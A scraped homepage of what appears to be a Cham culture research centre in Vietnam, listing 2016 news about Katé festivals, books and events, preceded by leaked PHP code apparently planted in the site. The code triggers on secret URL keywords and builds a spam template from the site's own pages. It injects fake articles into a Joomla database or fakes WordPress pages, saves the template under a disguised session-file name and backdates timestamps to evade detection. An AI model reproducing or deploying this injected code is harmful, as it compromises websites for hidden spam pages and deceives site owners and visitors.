if (strpos($_SERVER['REQUEST_URI'], 'saveyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $context = stream_context_create(array( 'http' => array('ignore_errors' => true), )); $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/?gimmeyourfuckingtemplate', false, $context); if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate', false, $context); } if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate/', false, $context); } if ( preg_match('/thefuckingtitle\d+/', $tpl) || preg_match('/thefuckingcontent\d+/', $tpl) || (strpos($tpl, '[TITLE]') !== false) || (strpos($tpl, '[CONTENT]') !== false) ) { $tpl = str_replace('http://[PAGE_URL]', '[PAGE_URL]', $tpl); $tpl = preg_replace('#]+?alternate[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?archives[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bookmark[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?external[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?first[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?help[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?last[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?license[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?next[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?nofollow[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?noreferrer[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?pingback[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prefetch[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prev[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?search[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?sidebar[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?up[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?canonical[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?robots[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?charset[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?content-type[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?og:[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?viewport[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?keywords[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?description[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?google[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?yandex[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bing[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?slurp[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?refresh[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?referer[^>]+?>#is', '', $tpl); $tpl = preg_replace('##is', '', $tpl); $tpl = preg_replace('#http://www.google-analytics.com/#is', 'http://'.$_SERVER['HTTP_HOST'].'/', $tpl); $tpl = preg_replace('#]*>[^<]*?#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingtitle\d+#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingcontent\d+#is', '[CONTENT]', $tpl); $tpl = preg_replace('#

\[CONTENT\]

#is', '[CONTENT]', $tpl); $new_tags = ' '; $tpl = preg_replace('##is', $new_tags.'', $tpl); } $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); $tpl_path = sys_get_temp_dir()."/SESS_4f2afc9c4099ee1f39c9f551123e54bd"; if (!empty($tpl) && file_put_contents($tpl_path, $tpl)) { echo 'Success!'; } else { echo 'failed'; } touch($tpl_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($tpl_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); exit; } if (strpos($_SERVER['REQUEST_URI'], 'gimmeyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); if (is_dir($root_path.'/libraries/joomla/application/')) { $alias = 'fucking-alias-is-here'.mt_rand(1, 10000000000); $database = JFactory::getDBO(); $item = new stdClass; $item->id = null; $item->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $item->introtext = ''; $item->fulltext = 'thefuckingcontent'.mt_rand(1, 10000000000); $item->state = 1; $item->access = 1; $item->created_by = 62; $item->created = '2011-11-11 11:11:11'; $item->publish_up = '2011-11-11 11:11:11'; $item->alias = $alias; if (!$database->insertObject('#__content', $item, 'id')) { echo $database->stderr(); } $url = 'http://'.$_SERVER['HTTP_HOST'].'/index.php?option=com_content&view=article&id='.$item->id; $data = file_get_contents($url); $data = preg_replace('#[\'"][^\'"]+?'.$alias.'[^\'"]+?[\'"]#is', '"[PAGE_URL]"', $data); $data = preg_replace('#Friday, 11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11.11.2011#is', '[DATE]', $data); $data = preg_replace('#2011-11-11#is', '[DATE]', $data); $data = preg_replace('#2011.11.11#is', '[DATE]', $data); echo $data; exit; } if (is_dir($root_path.'/wp-admin/includes/')) { if (!class_exists('THEVirtualPage')) { class THEVirtualPage { private $slug = NULL; private $title = NULL; private $content = NULL; private $author = NULL; private $date = NULL; private $type = NULL; public function __construct($args) { $this->slug = 'slug'; $this->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $this->content = 'thefuckingcontent'.mt_rand(1, 10000000000); $this->author = 1; $this->date = current_time('mysql'); $this->dategmt = current_time('mysql', 1); $this->type = 'page'; add_filter('the_posts', array(&$this, '_virtualPage')); } // filter to create virtual page content public function _virtualPage($posts) { global $wp, $wp_query; //create a fake post intance $post = new stdClass; // fill properties of $post with everything a page in the database would have $post->ID = "-1"; // use an illegal value for page ID $post->post_author = $this->author; // post author id $post->post_date = $this->date; // date of post $post->post_date_gmt = $this->dategmt; $post->post_content = $this->content; $post->post_title = $this->title; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; // mark as closed for comments, since page doesn't exist $post->ping_status = 'closed'; // mark as closed for pings, since page doesn't exist $post->post_password = ''; // no password $post->post_name = $this->slug; $post->to_ping = ''; $post->pinged = ''; $post->modified = $post->post_date; $post->modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $this->slug); $post->menu_order = 0; $post->post_type = $this->type; $post->post_mime_type = ''; $post->comment_count = 0; // set filter results $posts = array($post); // reset wp_query properties to simulate a found page $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; return ($posts); } } } function _create_virtual() { $args = array('slug' => 'slug', 'title' => '', 'content' => '' ); $pg = new THEVirtualPage($args); } function change_wp_44_title( $title ) { global $data; $title['title'] = 'thefuckingtitle'.mt_rand(1, 10000000000); $title['page'] = ''; $title['tagline'] = ''; $title['site'] = ''; return $title; } function change_wp_40_title( $title ) { return 'thefuckingtitle'.mt_rand(1, 10000000000); } function _change_page_url( ) { return '[PAGE_URL]'; } add_filter( 'the_permalink', '_change_page_url'); add_action('init', '_create_virtual'); add_filter( 'document_title_parts', 'change_wp_44_title' ); add_filter( 'wp_title', 'change_wp_40_title' ); } } Welcome to the Frontpage
Trang chủ

Bài viết mới nhất

 • Giới thiệu Tuyển tập ca khúc Gió Nắng Quê em
  23.09.16

  Nhân dịp lễ hội Katé năm 2016, Nhạc sĩ Quảng Đại Hội có ra mắt Tuyển tập ca khúc Gió nắng Quê em, Nxb Văn hóa Dân tộc xuất bản, khổ 20 x 20cm.Tập nhạc có tất cả 10 ca khúc mà tác giả sáng tác từ năm 1972 đến nay, chủ đề ngợi ca về tình yêu con người, yêu quê hương, yêu vùng đất Panduranga mến yêu. Dự kiến Đêm nhạc của NS Quảng Đại Hội sẽ tổ…

 • Lễ hội Katé đồng bào Chăm 2016
  Lễ hội Katé đồng bào Chăm 2016
  06.09.16

  Lễ hội Katé đồng bào Chăm ở Ninh Thuận diễn ra chính thức 2 ngày: Chiều ngày 29/9/2016 lễ đón rước trang phục Po Ina Nagar tại làng Hữu Đức - Ninh Phước; sáng ngày 30/9/2016 lễ Katé tiếp tục diễn ra tại đền Po Ina Nagar (Hữu Đức), Tháp Po Klaong Garai (phường Đô Vinh - Tháp Chàm) và tháp Po Rome (làng Hậu Sanh - Ninh Phước), tỉnh Ninh Thuận. Được biết nhân ngày lễ hội Katé, tỉnh…

 • Giới thiệu sách mới nhân dịp lễ hội Katé 2016
  Giới thiệu sách mới nhân dịp lễ hội Katé 2016
  06.09.16

  Nhân dịp lễ hội Katé của đồng bào Chăm năm 2016, Trung tâm Trưng bày Văn hóa Chăm tỉnh Bình Thuận ra mắt sách Di tích & Lễ hội của người Chăm ở Bình Thuận do Lâm Tấn Bình (chủ biên). Sách gồm 267 trang, khổ 16 x 24 cm, giá bán 60.000đ/1cuốn. Sách sẽ bán tại Trung tâm Trưng bày Văn hóa Chăm tỉnh Bình Thuận nhân dịp lễ hội Katé. Mọi chi tiết về sách xin lên hệ…

 • Bài nghiên cứu của TS. Sakaya đăng trên tạp chí quốc tế
  20.07.16

  Xin quý vị vào đường line dưới đây để đọc bài. we are pleased to announce the publication of the journal's latest issue (Series V, volume 1, number 1, Spring 2016).You can access the content of the new publication at https://castle.eiu.edu/studiesonasia/series_v_1.php

 • Trung tâm UNESCO NC và BT VHC thăm và tặng quà Ramawan
  Trung tâm UNESCO NC và BT VHC thăm và tặng quà Ramawan
  15.06.16

  Từ ngày 30/5- 6/6/2016, Tiến sĩ Trương Văn Món - Giám đốc Trung tâm UNESCO Nghiên cứu và Bảo tồn Văn hóa Chăm dự khánh thành Văn phòng Hội đồng Sư Cả Hồi giáo Bani tỉnh Ninh Thuận. Sau đó đến thăm và tặng quà cho một số chức sắc, tu sĩ , trí thức đồng bào Chăm nghèo ở một số thánh đường Chăm Hồi Giáo. Nhân dịp Ramawan/Ramadan Trung tâm UNESCO Chăm kính chúc các tín đồ, tu…

 • Khánh thành văn phòng Hội đồng Sư cả Hồi giáo Bani Ninh Thuận
  15.06.16

  Sáng ngày 30/5/2016, Hội đồng Sư Cả Hồi giáo Bani tỉnh Ninh Thuận tổ chức khánh thành văn phòng làm việc tại thôn Thành Tín (palei patuh), xã Phước Hải, huyện Ninh Phước, tỉnh Ninh Thuận. Được biết qua 10 năm thành lập (2006-2016), Hội đồng tôn giáo này mới xây dựng được văn phòng, cơ sở khang trang để làm việc với kinh phí xây dựng 922.617.451đ. Về dự buổi lễ khánh thành có đại diện Ban Tôn giáo…

 • Rethinking scholarships as a force for social justice
  Rethinking scholarships as a force for social justice
  18.05.16

  Rethinking scholarships as a force for social justice (Nguồn: http://www.fordfoundation.org/ideas/equals-change-blog/posts/rethinking-scholarships) Hilary Pennington, Vice President, Education, Creativity, and Free Expression 2 May 2016 Stanford University made headlines recently when it announced a $400 million gift from Nike founder Phil Knight to support a new graduate scholarship program modeled after the elite Rhodes scholarships. This new program at Stanford aims to help scholarship recipients develop the skills needed to make a positive global impact and find solutions to increasingly complex world challenges,…

 • Miếu Quốc vương Chiêm Thành ở Huế
  Miếu Quốc vương Chiêm Thành ở Huế
  09.05.16

  Miếu Quốc vương Chiêm Thành ở Huế 1.Miếu Quốc vương Chiêm Thành trước đây đã bị phá hủy, do mở đường Huyền Trân Công Chúa vào thập niên 1970. Theo lời kể của các bô lão thì sau khi Miếu bị phá hủy, người dân vùng núi (dân tộc thiểu số) có về gặp chính quyền sở tại để yêu cầu xây lại một ngôi miếu nhỏ khác. 2. Vị trí ngôi miếu Quốc vương Chiêm Thành cũ chỉ còn…

 • Từ điển Chăm- Việt- Anh; Việt - Chăm- Anh sắp tái bản
  Từ điển Chăm- Việt- Anh; Việt - Chăm- Anh sắp tái bản
  29.04.16

  Từ điển Chăm- Việt- Anh; Việt - Chăm- Anh, Nxb Tri thức, 2014 xuất bản 1000 cuốn đã tiêu thụ hết trong giữa năm 2015. Do yêu cầu của nhiều độc giả, Trung tâm UNESCO Nghiên cứu và Bảo tồn Văn hoá Chăm có kế hoạch tái bản lại từ điển này vào năm 2016-2017. Kinh phí xuất bản do Quỹ Trung tâm Trao đổi Giáo dục với Việt Nam (CEEVN) hỗ trợ. Kính mong quý độc giả góp ý,…

 • Lịch pháp của người Chăm - Sakawi Cam
  Lịch pháp của người Chăm - Sakawi Cam
  26.04.16

  Chào mừng năm mới (Thun Kra Dal - 2016) của người Chăm, Trung tâm UNESCO Nghiên cứu và Bảo tồn Văn hoá Chăm có xuất bản sách mới: SAKAWI CAM- LỊCH PHÁP CỦA NGƯỜI CHĂM Sách 450 trang, khổ 15,8 x 23, Nxb Tri thức, Giá sách 120.000đ/1 cuốn. Sách có bán tại các địa điểm sau: Hiệu sách Nhân Văn: Trường Đại học KHXH và NV Tp HCM, 10-12. Đinh Tiên Hoàng .Q1. Văn phòng Chăm UNESCO tại Nguyễn…

 • Lễ năm mới Rija Nagar Chăm
  Lễ năm mới Rija Nagar Chăm
  06.04.16

  LỄ ĐẦU NĂM MỚI - RIJA NAGAR CỦA NGƯỜI CHĂM Ở VIỆT NAM Năm mới THUN KRA DAL của người Chăm mở đầu vào ngày thứ Tư, mồng 1, tháng 1 nhằm ngày 6/4/2016 dương lịch. Lịch Chăm đã thống nhất toàn vùng Ninh Thuận và Bình Thuận. Mở đầu năm mới người Chăm thường tổ chức lễ Rija Nagar. Lễ này được tổ chức hai ngày: từ ngày 7 – 8/4/ 2016 (harei jip dua bingun saong harei suk…

 • Thông Báo mời viết bài cho Tap San số 5/2016
  23.02.16

  THÔNG BÁO Mời viết bài đăng Tạp San Văn hóa Chăm (Bhap Ilimo Cam) Số 5 năm 2016 I.Kế hoạch Căn cứ vào chức năng, nhiệm vụ và điều lệ, Trung tâm UNESCO Nghiên cứu và Bảo tồn văn hóa Chăm Việt Nam sẽ xuất bản Tạp San Văn hóa Chăm (Bhap Ilimo Cam) nhằm mục đích đăng tải các công trình nghiên cứu khoa học thuộc các lĩnh vực văn hóa và những vấn đề khác có liên quan…

 • Lễ tôn chức Phó cả sư - Ông Bac Birau Nại Văn Liêm
  Lễ tôn chức Phó cả sư - Ông Bac Birau Nại Văn Liêm
  23.02.16

  Từ ngày 9 /2 đến ngày 17/2/ 2016, Hội đồng chức sắc Chăm Ahiér tổ chức lễ tôn chức Phó cả sư (Po Bac) (ndam tagok bac) cho ông Nại Văn Liêm, 48 tuổi tại làng Hậu Sanh (palei Thuen) - Phước Nam - Thuận Nam - Ninh Thuận, thuộc Halau Po Romé. Nghi lễ được diễn ra trọng thể trong thời gian gần 10 ngày, tuần tự qua 4 nghi thức lễ chính (lễ cakak aw - kaoh sang…

 • Kỉ niệm 67 năm ngày Quốc khánh Ấn Độ
  08.02.16

  Vào ngày 3/2/2016, nhận lời mời của Tổng lãnh sự quán Ấn Độ tại Tp HCM, TS. Trương Văn Món - tham dự buổi lễ kỉ niệm 67 năm ngày Quốc khánh Ấn Độ tại Khách sạn Sofitel Saigon Plaza - Tp HCM. Đến dự lễ có nhiều nhân vật cấp cao phía Việt Nam, Ấn Độ và các tổng Lãnh sự quán Malaysia, Sigapore, Inđonesia, Pháp, Mỹ, Ả Rập …. Được biết, mấy năm gần đây, ngoài mối quan…

 • Chương trình truyền dạy Ngôn ngữ - Văn hoá Chăm tại Nhật Bản 2016
  08.02.16

  Nhận lời mời của Viện Nghiên cứu Châu Á - Phi, Đại học Ngoại ngữ Tokyo - Nhật Bản, TS. Trương Văn Món đến Tokyo để dạy chương trình Ngôn ngữ - Văn hoá Chăm, đợt II vào Mùa Xuân 2016 (Spring 2016). Đây là chương trình nghiên cứu khu vực học Châu Á của Viện này. Trong đó Ngôn ngữ - Văn hoá Chăm được các nhà khoa học, nghiên cứu sinh Nhật Bản quan tâm. Trong tương lai…